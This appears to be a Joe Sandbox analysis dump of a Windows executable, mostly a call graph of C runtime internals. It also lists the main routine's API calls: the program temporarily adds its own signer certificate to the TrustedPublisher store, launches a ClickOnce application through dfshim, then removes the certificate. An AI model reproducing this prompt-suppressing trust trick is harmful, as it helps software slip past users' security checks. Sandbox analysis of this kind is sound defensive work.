b62543 ___vcrt_FlsFree 5 API calls 5187->5188 5189 b62683 5188->5189 5190 b6269b TlsFree 5189->5190 5191 b6268f 5189->5191 5190->5191 5191->5186 5193 b61a47 GetStartupInfoW 5192->5193 5193->5071 5195 b6523d 5194->5195 5196 b65234 5194->5196 5195->5074 5201 b6512a 5196->5201 5683 b6555d 5198->5683 5221 b64424 GetLastError 5201->5221 5203 b65137 5241 b65249 5203->5241 5205 b6513f 5250 b64ebe 5205->5250 5208 b65156 5208->5195 5212 b6518c 5214 b65194 5212->5214 5215 b651b1 5212->5215 5272 b647f9 5214->5272 5217 b651dd 5215->5217 5218 b64869 _free 15 API calls 5215->5218 5220 b65199 5217->5220 5281 b64d94 5217->5281 5218->5217 5275 b64869 5220->5275 5222 b64440 5221->5222 5223 b6443a 5221->5223 5226 b6448f SetLastError 5222->5226 5289 b6480c 5222->5289 5284 b65904 5223->5284 5226->5203 5228 b6445a 5230 b64869 _free 15 API calls 5228->5230 5232 b64460 5230->5232 5231 b6446f 5231->5228 5233 b64476 5231->5233 5234 b6449b SetLastError 5232->5234 5301 b64296 5233->5301 5306 b63f24 5234->5306 5238 b64869 _free 15 API calls 5240 b64488 
5238->5240 5240->5226 5240->5234 5242 b65255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 b64424 _abort 33 API calls 5242->5243 5248 b6525f 5243->5248 5245 b652e3 _abort 5245->5205 5246 b63f24 _abort 33 API calls 5246->5248 5248->5245 5248->5246 5249 b64869 _free 15 API calls 5248->5249 5542 b656e2 EnterCriticalSection 5248->5542 5543 b652da 5248->5543 5249->5248 5547 b63f72 5250->5547 5253 b64ef1 5255 b64f08 5253->5255 5256 b64ef6 GetACP 5253->5256 5254 b64edf GetOEMCP 5254->5255 5255->5208 5257 b662ff 5255->5257 5256->5255 5258 b6633d 5257->5258 5262 b6630d _abort 5257->5262 5260 b647f9 _free 15 API calls 5258->5260 5259 b66328 HeapAlloc 5261 b65167 5259->5261 5259->5262 5260->5261 5261->5220 5264 b652eb 5261->5264 5262->5258 5262->5259 5263 b66992 _abort 2 API calls 5262->5263 5263->5262 5265 b64ebe 35 API calls 5264->5265 5266 b6530a 5265->5266 5267 b6535b IsValidCodePage 5266->5267 5269 b65311 _ValidateLocalCookies 5266->5269 5271 b65380 _abort 5266->5271 5268 b6536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5212 5584 b64f96 GetCPInfo 5271->5584 5273 b644a8 _abort 15 API calls 5272->5273 5274 b647fe 5273->5274 5274->5220 5276 b64874 HeapFree 5275->5276 5280 b6489d _free 5275->5280 5277 b64889 5276->5277 5276->5280 5278 b647f9 _free 13 API calls 5277->5278 5279 b6488f GetLastError 5278->5279 5279->5280 5280->5208 5647 b64d51 5281->5647 5283 b64db8 5283->5220 5317 b65741 5284->5317 5286 b6592b 5287 b65943 TlsGetValue 5286->5287 5288 b65937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5222 5295 b64819 _abort 5289->5295 5290 b64859 5292 b647f9 _free 14 API calls 5290->5292 5291 b64844 HeapAlloc 5293 b64452 5291->5293 5291->5295 5292->5293 5293->5228 5296 b6595a 5293->5296 5295->5290 5295->5291 5330 b66992 5295->5330 5297 b65741 _abort 5 API calls 5296->5297 5298 b65981 5297->5298 5299 b6599c TlsSetValue 5298->5299 5300 b65990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5231 5344 b6426e 5301->5344 5452 b66b14 5306->5452 5309 
b63f35 5311 b63f3e IsProcessorFeaturePresent 5309->5311 5312 b63f5c 5309->5312 5313 b63f49 5311->5313 5314 b63793 _abort 23 API calls 5312->5314 5480 b64573 5313->5480 5316 b63f66 5314->5316 5318 b65771 _abort 5317->5318 5320 b6576d 5317->5320 5318->5286 5320->5318 5322 b65791 5320->5322 5323 b657dd 5320->5323 5321 b6579d GetProcAddress 5321->5318 5322->5318 5322->5321 5324 b657fe LoadLibraryExW 5323->5324 5325 b657f3 5323->5325 5326 b65833 5324->5326 5327 b6581b GetLastError 5324->5327 5325->5320 5326->5325 5328 b6584a FreeLibrary 5326->5328 5327->5326 5329 b65826 LoadLibraryExW 5327->5329 5328->5325 5329->5326 5333 b669d6 5330->5333 5332 b669a8 _ValidateLocalCookies 5332->5295 5334 b669e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 b656e2 EnterCriticalSection 5334->5339 5336 b669ed 5340 b66a1f 5336->5340 5338 b66a14 _abort 5338->5332 5339->5336 5343 b6572a LeaveCriticalSection 5340->5343 5342 b66a26 5342->5338 5343->5342 5350 b641ae 5344->5350 5346 b64292 5347 b6421e 5346->5347 5361 b640b2 5347->5361 5349 b64242 5349->5238 5351 b641ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 b656e2 EnterCriticalSection 5351->5356 5353 b641c4 5357 b641ea 5353->5357 5355 b641e2 _abort 5355->5346 5356->5353 5360 b6572a LeaveCriticalSection 5357->5360 5359 b641f4 5359->5355 5360->5359 5362 b640be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 b656e2 EnterCriticalSection 5362->5369 5364 b640c8 5370 b643d9 5364->5370 5366 b640e0 5374 b640f6 5366->5374 5368 b640ee _abort 5368->5349 5369->5364 5371 b6440f __fassign 5370->5371 5372 b643e8 __fassign 5370->5372 5371->5366 5372->5371 5377 b66507 5372->5377 5451 b6572a LeaveCriticalSection 5374->5451 5376 b64100 5376->5368 5378 b66587 5377->5378 5381 b6651d 5377->5381 5379 b665d5 5378->5379 5382 b64869 _free 15 API calls 5378->5382 5445 b6667a 5379->5445 5381->5378 5383 b66550 5381->5383 5388 b64869 _free 15 API calls 5381->5388 5384 b665a9 5382->5384 5385 b66572 5383->5385 5394 b64869 _free 15 API calls 
5383->5394 5386 b64869 _free 15 API calls 5384->5386 5387 b64869 _free 15 API calls 5385->5387 5389 b665bc 5386->5389 5391 b6657c 5387->5391 5393 b66545 5388->5393 5395 b64869 _free 15 API calls 5389->5395 5390 b665e3 5392 b66643 5390->5392 5404 b64869 15 API calls _free 5390->5404 5396 b64869 _free 15 API calls 5391->5396 5397 b64869 _free 15 API calls 5392->5397 5405 b66078 5393->5405 5399 b66567 5394->5399 5400 b665ca 5395->5400 5396->5378 5401 b66649 5397->5401 5433 b66176 5399->5433 5403 b64869 _free 15 API calls 5400->5403 5401->5371 5403->5379 5404->5390 5406 b66089 5405->5406 5432 b66172 5405->5432 5407 b6609a 5406->5407 5408 b64869 _free 15 API calls 5406->5408 5409 b660ac 5407->5409 5410 b64869 _free 15 API calls 5407->5410 5408->5407 5411 b660be 5409->5411 5412 b64869 _free 15 API calls 5409->5412 5410->5409 5413 b660d0 5411->5413 5414 b64869 _free 15 API calls 5411->5414 5412->5411 5415 b64869 _free 15 API calls 5413->5415 5418 b660e2 5413->5418 5414->5413 5415->5418 5416 b64869 _free 15 API calls 5417 b660f4 5416->5417 5419 b64869 _free 15 API calls 5417->5419 5420 b66106 5417->5420 5418->5416 5418->5417 5419->5420 5421 b66118 5420->5421 5422 b64869 _free 15 API calls 5420->5422 5423 b6612a 5421->5423 5424 b64869 _free 15 API calls 5421->5424 5422->5421 5425 b6613c 5423->5425 5426 b64869 _free 15 API calls 5423->5426 5424->5423 5427 b6614e 5425->5427 5428 b64869 _free 15 API calls 5425->5428 5426->5425 5429 b66160 5427->5429 5430 b64869 _free 15 API calls 5427->5430 5428->5427 5431 b64869 _free 15 API calls 5429->5431 5429->5432 5430->5429 5431->5432 5432->5383 5434 b66183 5433->5434 5435 b661db 5433->5435 5436 b66193 5434->5436 5437 b64869 _free 15 API calls 5434->5437 5435->5385 5438 b661a5 5436->5438 5439 b64869 _free 15 API calls 5436->5439 5437->5436 5440 b661b7 5438->5440 5441 b64869 _free 15 API calls 5438->5441 5439->5438 5442 b661c9 5440->5442 5443 b64869 _free 15 API calls 5440->5443 5441->5440 5442->5435 5444 b64869 _free 15 API calls 
5442->5444 5443->5442 5444->5435 5446 b66687 5445->5446 5450 b666a5 5445->5450 5447 b6621b __fassign 15 API calls 5446->5447 5446->5450 5448 b6669f 5447->5448 5449 b64869 _free 15 API calls 5448->5449 5449->5450 5450->5390 5451->5376 5484 b66a82 5452->5484 5455 b66b6f 5456 b66b7b _abort 5455->5456 5457 b66ba2 _abort 5456->5457 5459 b66ba8 _abort 5456->5459 5498 b644a8 GetLastError 5456->5498 5457->5459 5460 b66bf4 5457->5460 5464 b66bd7 _abort 5457->5464 5466 b66c20 5459->5466 5520 b656e2 EnterCriticalSection 5459->5520 5461 b647f9 _free 15 API calls 5460->5461 5462 b66bf9 5461->5462 5517 b6473d 5462->5517 5464->5309 5467 b66c7f 5466->5467 5469 b66c77 5466->5469 5477 b66caa 5466->5477 5521 b6572a LeaveCriticalSection 5466->5521 5467->5477 5522 b66b66 5467->5522 5472 b63793 _abort 23 API calls 5469->5472 5472->5467 5475 b64424 _abort 33 API calls 5478 b66d0d 5475->5478 5476 b66b66 _abort 33 API calls 5476->5477 5525 b66d2f 5477->5525 5478->5464 5479 b64424 _abort 33 API calls 5478->5479 5479->5464 5481 b6458f _abort 5480->5481 5482 b645bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 b6468c _abort _ValidateLocalCookies 5482->5483 5483->5312 5487 b66a28 5484->5487 5486 b63f29 5486->5309 5486->5455 5488 b66a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 b656e2 EnterCriticalSection 5488->5493 5490 b66a42 5494 b66a76 5490->5494 5492 b66a69 _abort 5492->5486 5493->5490 5497 b6572a LeaveCriticalSection 5494->5497 5496 b66a80 5496->5492 5497->5496 5499 b644c1 5498->5499 5500 b644c7 5498->5500 5501 b65904 _abort 6 API calls 5499->5501 5502 b6480c _abort 12 API calls 5500->5502 5505 b6451e SetLastError 5500->5505 5501->5500 5503 b644d9 5502->5503 5504 b644e1 5503->5504 5507 b6595a _abort 6 API calls 5503->5507 5508 b64869 _free 12 API calls 5504->5508 5506 b64527 5505->5506 5506->5457 5509 b644f6 5507->5509 5510 b644e7 5508->5510 5509->5504 5511 b644fd 5509->5511 5512 b64515 SetLastError 5510->5512 5513 b64296 _abort 12 
API calls 5511->5513 5512->5506 5514 b64508 5513->5514 5515 b64869 _free 12 API calls 5514->5515 5516 b6450e 5515->5516 5516->5505 5516->5512 5529 b646c2 5517->5529 5519 b64749 5519->5464 5520->5466 5521->5469 5523 b64424 _abort 33 API calls 5522->5523 5524 b66b6b 5523->5524 5524->5476 5526 b66d35 5525->5526 5527 b66cfe 5525->5527 5541 b6572a LeaveCriticalSection 5526->5541 5527->5464 5527->5475 5527->5478 5530 b644a8 _abort 15 API calls 5529->5530 5531 b646d8 5530->5531 5535 b646e6 _ValidateLocalCookies 5531->5535 5537 b6474d IsProcessorFeaturePresent 5531->5537 5533 b6473c 5534 b646c2 _abort 21 API calls 5533->5534 5536 b64749 5534->5536 5535->5519 5536->5519 5538 b64758 5537->5538 5539 b64573 _abort 3 API calls 5538->5539 5540 b6476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5527 5542->5248 5546 b6572a LeaveCriticalSection 5543->5546 5545 b652e1 5545->5248 5546->5545 5548 b63f85 5547->5548 5549 b63f8f 5547->5549 5548->5253 5548->5254 5549->5548 5550 b64424 _abort 33 API calls 5549->5550 5551 b63fb0 5550->5551 5555 b672d1 5551->5555 5556 b672e4 5555->5556 5557 b63fc9 5555->5557 5556->5557 5563 b66754 5556->5563 5559 b672fe 5557->5559 5560 b67311 5559->5560 5561 b67326 5559->5561 5560->5561 5562 b65249 __fassign 33 API calls 5560->5562 5561->5548 5562->5561 5564 b66760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 b64424 _abort 33 API calls 5564->5565 5566 b66769 5565->5566 5567 b667b7 _abort 5566->5567 5575 b656e2 EnterCriticalSection 5566->5575 5567->5557 5569 b66787 5576 b667cb 5569->5576 5574 b63f24 _abort 33 API calls 5574->5567 5575->5569 5577 b6679b 5576->5577 5578 b667d9 __fassign 5576->5578 5580 b667ba 5577->5580 5578->5577 5579 b66507 __fassign 15 API calls 5578->5579 5579->5577 5583 b6572a LeaveCriticalSection 5580->5583 5582 b667ae 5582->5567 5582->5574 5583->5582 5588 b64fd0 5584->5588 5591 b6507a _ValidateLocalCookies 5584->5591 5586 b65031 5604 b67cd1 5586->5604 5592 b6634d 5588->5592 5590 b67cd1 38 API calls 
5590->5591 5591->5269 5593 b63f72 __fassign 33 API calls 5592->5593 5594 b6636d MultiByteToWideChar 5593->5594 5596 b663ab 5594->5596 5597 b66443 _ValidateLocalCookies 5594->5597 5598 b662ff 16 API calls 5596->5598 5600 b663cc _abort __alloca_probe_16 5596->5600 5597->5586 5598->5600 5599 b6643d 5609 b6646a 5599->5609 5600->5599 5602 b66411 MultiByteToWideChar 5600->5602 5602->5599 5603 b6642d GetStringTypeW 5602->5603 5603->5599 5605 b63f72 __fassign 33 API calls 5604->5605 5606 b67ce4 5605->5606 5613 b67ab4 5606->5613 5608 b65052 5608->5590 5610 b66476 5609->5610 5611 b66487 5609->5611 5610->5611 5612 b64869 _free 15 API calls 5610->5612 5611->5597 5612->5611 5614 b67acf 5613->5614 5615 b67af5 MultiByteToWideChar 5614->5615 5616 b67b1f 5615->5616 5617 b67ca9 _ValidateLocalCookies 5615->5617 5618 b662ff 16 API calls 5616->5618 5621 b67b40 __alloca_probe_16 5616->5621 5617->5608 5618->5621 5619 b67bf5 5624 b6646a __freea 15 API calls 5619->5624 5620 b67b89 MultiByteToWideChar 5620->5619 5622 b67ba2 5620->5622 5621->5619 5621->5620 5638 b65a15 5622->5638 5624->5617 5625 b67bb9 5625->5619 5626 b67c04 5625->5626 5627 b67bcc 5625->5627 5630 b662ff 16 API calls 5626->5630 5633 b67c25 __alloca_probe_16 5626->5633 5627->5619 5629 b65a15 6 API calls 5627->5629 5628 b67c9a 5632 b6646a __freea 15 API calls 5628->5632 5629->5619 5630->5633 5631 b65a15 6 API calls 5634 b67c79 5631->5634 5632->5619 5633->5628 5633->5631 5634->5628 5635 b67c88 WideCharToMultiByte 5634->5635 5635->5628 5636 b67cc8 5635->5636 5637 b6646a __freea 15 API calls 5636->5637 5637->5619 5639 b65741 _abort 5 API calls 5638->5639 5640 b65a3c 5639->5640 5643 b65a45 _ValidateLocalCookies 5640->5643 5644 b65a9d 5640->5644 5642 b65a85 LCMapStringW 5642->5643 5643->5625 5645 b65741 _abort 5 API calls 5644->5645 5646 b65ac4 _ValidateLocalCookies 5645->5646 5646->5642 5648 b64d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 b656e2 EnterCriticalSection 5648->5655 5650 b64d67 5656 b64dbc 5650->5656 5654 
b64d80 _abort 5654->5283 5655->5650 5668 b654dc 5656->5668 5658 b64e0a 5659 b654dc 21 API calls 5658->5659 5660 b64e26 5659->5660 5661 b654dc 21 API calls 5660->5661 5662 b64e44 5661->5662 5663 b64d74 5662->5663 5664 b64869 _free 15 API calls 5662->5664 5665 b64d88 5663->5665 5664->5663 5682 b6572a LeaveCriticalSection 5665->5682 5667 b64d92 5667->5654 5669 b654ed 5668->5669 5673 b654e9 5668->5673 5670 b654f4 5669->5670 5675 b65507 _abort 5669->5675 5671 b647f9 _free 15 API calls 5670->5671 5672 b654f9 5671->5672 5674 b6473d _abort 21 API calls 5672->5674 5673->5658 5674->5673 5675->5673 5676 b65535 5675->5676 5678 b6553e 5675->5678 5677 b647f9 _free 15 API calls 5676->5677 5679 b6553a 5677->5679 5678->5673 5680 b647f9 _free 15 API calls 5678->5680 5681 b6473d _abort 21 API calls 5679->5681 5680->5679 5681->5673 5682->5667 5684 b63f72 __fassign 33 API calls 5683->5684 5685 b65571 5684->5685 5685->5074 5687 b6356a _abort 5686->5687 5688 b63582 5687->5688 5701 b636b8 GetModuleHandleW 5687->5701 5708 b656e2 EnterCriticalSection 5688->5708 5695 b635ff _abort 5712 b63668 5695->5712 5696 b6358a 5696->5695 5709 b63c97 5696->5709 5697 b63671 _abort 5697->5107 5702 b63576 5701->5702 5702->5688 5703 b636fc GetModuleHandleExW 5702->5703 5704 b63726 GetProcAddress 5703->5704 5705 b6373b 5703->5705 5704->5705 5706 b6374f FreeLibrary 5705->5706 5707 b63758 _ValidateLocalCookies 5705->5707 5706->5707 5707->5688 5708->5696 5723 b639d0 5709->5723 5743 b6572a LeaveCriticalSection 5712->5743 5714 b63641 5714->5697 5715 b63677 5714->5715 5744 b65b1f 5715->5744 5717 b63681 5718 b636a5 5717->5718 5719 b63685 GetPEB 5717->5719 5721 b636fc _abort 3 API calls 5718->5721 5719->5718 5720 b63695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 b636ad ExitProcess 5721->5722 5726 b6397f 5723->5726 5725 b639f4 5725->5695 5727 b6398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 b656e2 EnterCriticalSection 5727->5734 5729 b63999 5735 b63a20 5729->5735 5731 b639a6 5739 
b639c4 5731->5739 5733 b639b7 _abort 5733->5725 5734->5729 5736 b63a40 _ValidateLocalCookies 5735->5736 5737 b63a48 5735->5737 5736->5731 5737->5736 5738 b64869 _free 15 API calls 5737->5738 5738->5736 5742 b6572a LeaveCriticalSection 5739->5742 5741 b639ce 5741->5733 5742->5741 5743->5714 5745 b65b44 5744->5745 5747 b65b3a _ValidateLocalCookies 5744->5747 5746 b65741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6671 b6324d 6672 b6522b 46 API calls 6671->6672 6673 b6325f 6672->6673 6682 b6561e GetEnvironmentStringsW 6673->6682 6676 b6326a 6678 b64869 _free 15 API calls 6676->6678 6679 b6329f 6678->6679 6680 b63275 6681 b64869 _free 15 API calls 6680->6681 6681->6676 6683 b65635 6682->6683 6693 b65688 6682->6693 6686 b6563b WideCharToMultiByte 6683->6686 6684 b65691 FreeEnvironmentStringsW 6685 b63264 6684->6685 6685->6676 6694 b632a5 6685->6694 6687 b65657 6686->6687 6686->6693 6688 b662ff 16 API calls 6687->6688 6689 b6565d 6688->6689 6690 b65664 WideCharToMultiByte 6689->6690 6691 b6567a 6689->6691 6690->6691 6692 b64869 _free 15 API calls 6691->6692 6692->6693 6693->6684 6693->6685 6695 b632ba 6694->6695 6696 b6480c _abort 15 API calls 6695->6696 6697 b632e1 6696->6697 6698 b63345 6697->6698 6701 b6480c _abort 15 API calls 6697->6701 6702 b63347 6697->6702 6706 b63369 6697->6706 6709 b64869 _free 15 API calls 6697->6709 6711 b63eca 6697->6711 6699 b64869 _free 15 API calls 6698->6699 6700 b6335f 6699->6700 6700->6680 6701->6697 6703 b63376 15 API calls 6702->6703 6705 b6334d 6703->6705 6707 b64869 _free 15 API calls 6705->6707 6708 b6474d _abort 6 API calls 6706->6708 6707->6698 6710 b63375 6708->6710 6709->6697 6712 b63ed7 6711->6712 6713 b63ee5 6711->6713 6712->6713 6718 b63efc 6712->6718 6714 b647f9 _free 15 API calls 6713->6714 6715 b63eed 6714->6715 6716 b6473d _abort 21 API calls 6715->6716 6717 b63ef7 6716->6717 6717->6697 6718->6717 6719 b647f9 _free 15 API calls 6718->6719 6719->6715 5895 b64c8a 5900 b64cbf 5895->5900 5898 b64ca6 5899 b64869 
_free 15 API calls 5899->5898 5901 b64cd1 5900->5901 5910 b64c98 5900->5910 5902 b64cd6 5901->5902 5903 b64d01 5901->5903 5904 b6480c _abort 15 API calls 5902->5904 5903->5910 5911 b6681b 5903->5911 5905 b64cdf 5904->5905 5907 b64869 _free 15 API calls 5905->5907 5907->5910 5908 b64d1c 5909 b64869 _free 15 API calls 5908->5909 5909->5910 5910->5898 5910->5899 5912 b66826 5911->5912 5913 b6684e 5912->5913 5914 b6683f 5912->5914 5915 b6685d 5913->5915 5920 b67e13 5913->5920 5916 b647f9 _free 15 API calls 5914->5916 5927 b67e46 5915->5927 5919 b66844 _abort 5916->5919 5919->5908 5921 b67e33 HeapSize 5920->5921 5922 b67e1e 5920->5922 5921->5915 5923 b647f9 _free 15 API calls 5922->5923 5924 b67e23 5923->5924 5925 b6473d _abort 21 API calls 5924->5925 5926 b67e2e 5925->5926 5926->5915 5928 b67e53 5927->5928 5929 b67e5e 5927->5929 5930 b662ff 16 API calls 5928->5930 5931 b67e66 5929->5931 5937 b67e6f _abort 5929->5937 5935 b67e5b 5930->5935 5932 b64869 _free 15 API calls 5931->5932 5932->5935 5933 b67e74 5936 b647f9 _free 15 API calls 5933->5936 5934 b67e99 HeapReAlloc 5934->5935 5934->5937 5935->5919 5936->5935 5937->5933 5937->5934 5938 b66992 _abort 2 API calls 5937->5938 5938->5937 6720 b61248 6721 b61250 6720->6721 6737 b637f7 6721->6737 6723 b6125b 6744 b61664 6723->6744 6725 b6191f 4 API calls 6726 b612f2 6725->6726 6727 b61270 __RTC_Initialize 6735 b612cd 6727->6735 6750 b617f1 6727->6750 6729 b61289 6729->6735 6753 b618ab InitializeSListHead 6729->6753 6731 b6129f 6754 b618ba 6731->6754 6733 b612c2 6760 b63891 6733->6760 6735->6725 6736 b612ea 6735->6736 6738 b63829 6737->6738 6739 b63806 6737->6739 6738->6723 6739->6738 6740 b647f9 _free 15 API calls 6739->6740 6741 b63819 6740->6741 6742 b6473d _abort 21 API calls 6741->6742 6743 b63824 6742->6743 6743->6723 6745 b61674 6744->6745 6746 b61670 6744->6746 6747 b6191f 4 API calls 6745->6747 6749 b61681 ___scrt_release_startup_lock 6745->6749 6746->6727 6748 b616ea 6747->6748 6749->6727 6767 b617c4 6750->6767 
6753->6731 6805 b63e2a 6754->6805 6756 b618cb 6757 b618d2 6756->6757 6758 b6191f 4 API calls 6756->6758 6757->6733 6759 b618da 6758->6759 6759->6733 6761 b64424 _abort 33 API calls 6760->6761 6762 b6389c 6761->6762 6763 b647f9 _free 15 API calls 6762->6763 6766 b638d4 6762->6766 6764 b638c9 6763->6764 6765 b6473d _abort 21 API calls 6764->6765 6765->6766 6766->6735 6768 b617d3 6767->6768 6769 b617da 6767->6769 6773 b63c81 6768->6773 6776 b63cf1 6769->6776 6772 b617d8 6772->6729 6774 b63cf1 24 API calls 6773->6774 6775 b63c93 6774->6775 6775->6772 6779 b639f8 6776->6779 6782 b6392e 6779->6782 6781 b63a1c 6781->6772 6783 b6393a ___scrt_is_nonwritable_in_current_image 6782->6783 6790 b656e2 EnterCriticalSection 6783->6790 6785 b63948 6791 b63b40 6785->6791 6787 b63955 6801 b63973 6787->6801 6789 b63966 _abort 6789->6781 6790->6785 6792 b63b5e 6791->6792 6799 b63b56 _abort 6791->6799 6793 b63bb7 6792->6793 6794 b6681b 24 API calls 6792->6794 6792->6799 6795 b6681b 24 API calls 6793->6795 6793->6799 6796 b63bad 6794->6796 6797 b63bcd 6795->6797 6798 b64869 _free 15 API calls 6796->6798 6800 b64869 _free 15 API calls 6797->6800 6798->6793 6799->6787 6800->6799 6804 b6572a LeaveCriticalSection 6801->6804 6803 b6397d 6803->6789 6804->6803 6807 b63e48 6805->6807 6809 b63e68 6805->6809 6806 b647f9 _free 15 API calls 6808 b63e5e 6806->6808 6807->6806 6810 b6473d _abort 21 API calls 6808->6810 6809->6756 6810->6809 5939 b61489 5942 b61853 5939->5942 5941 b6148e 5941->5941 5943 b61869 5942->5943 5945 b61872 5943->5945 5946 b61806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5943->5946 5945->5941 5946->5945

Control-flow Graph

APIs
• LocalAlloc.KERNEL32(00000000,00000104), ref: 00B61016
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00B61025
• CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00B61032
• LocalAlloc.KERNELBASE(00000000,00040000), ref: 00B61057
• LocalAlloc.KERNEL32(00000000,00040000), ref: 00B61063
• CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00B61082
• CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00B610B2
• LocalAlloc.KERNEL32(00000000,?), ref: 00B610C5
• LocalAlloc.KERNEL32(00000000,00002000), ref: 00B610F4
• CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00B6110A
• CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00B6111A
• CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00B6112D
• CertFreeCertificateContext.CRYPT32(00000000), ref: 00B61134
• LocalFree.KERNEL32(00000000), ref: 00B6113E
• LocalFree.KERNEL32(00000000), ref: 00B6115D
• CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00B6116E
• CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00B61182
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00B61198
• CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00B611A9
• LoadLibraryA.KERNELBASE(dfshim), ref: 00B611BA
• GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00B611C6
• Sleep.KERNELBASE(00009C40), ref: 00B611E8
• CertDeleteCertificateFromStore.CRYPT32(?), ref: 00B6120B
• CertCloseStore.CRYPT32(?,00000000), ref: 00B6121A
• LocalFree.KERNEL32(?), ref: 00B61223
• LocalFree.KERNEL32(?), ref: 00B61228
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00B6122D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1532272760.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532247071.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532296764.0000000000B6B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532320850.0000000000B71000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1532349116.0000000000B73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b60000_khwHsyfsJ1.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                          • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                          • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                          • Opcode ID: f6bc77153e72251b51d4ac7aa5685f6a8e1e19e81c5e7771ca1c9a31e021b77a
                                                                                                                                                                                                                                                          • Instruction ID: 44d14f69490bb87ae8da8fcfae34cd309c3a3e39416d87660921077008257444
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6bc77153e72251b51d4ac7aa5685f6a8e1e19e81c5e7771ca1c9a31e021b77a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D615E71A40219BBEB119F94DC45FAFBBB5FF48B50F140054E614F72E0CBB999418BA4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00B6192B
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00B619F7
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B61A10
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00B61A1A
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: cd0626ba2e608b4f18ec5053b7266efc5c5c84b858c617a4b7b07497f82da66b
                                                                                                                                                                                                                                                          • Instruction ID: 81059be4c3f368fca1457f72ba52375506ba3643837a50d5e0c6b9d25dca9153
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd0626ba2e608b4f18ec5053b7266efc5c5c84b858c617a4b7b07497f82da66b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B431F875D052189BDF21DFA4D949BCDBBF8AF08301F1041EAE50CAB290EB759A85CF45
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B6466B
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B64675
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B64682
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: dbe28cc2ed3bfe08d488f251ffced8f0be0e831dc82f74d393b172249552e2da
                                                                                                                                                                                                                                                          • Instruction ID: 97600c7b845d3d4703d43ab178db299072e1ef8f4864126aa253018c42181635
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbe28cc2ed3bfe08d488f251ffced8f0be0e831dc82f74d393b172249552e2da
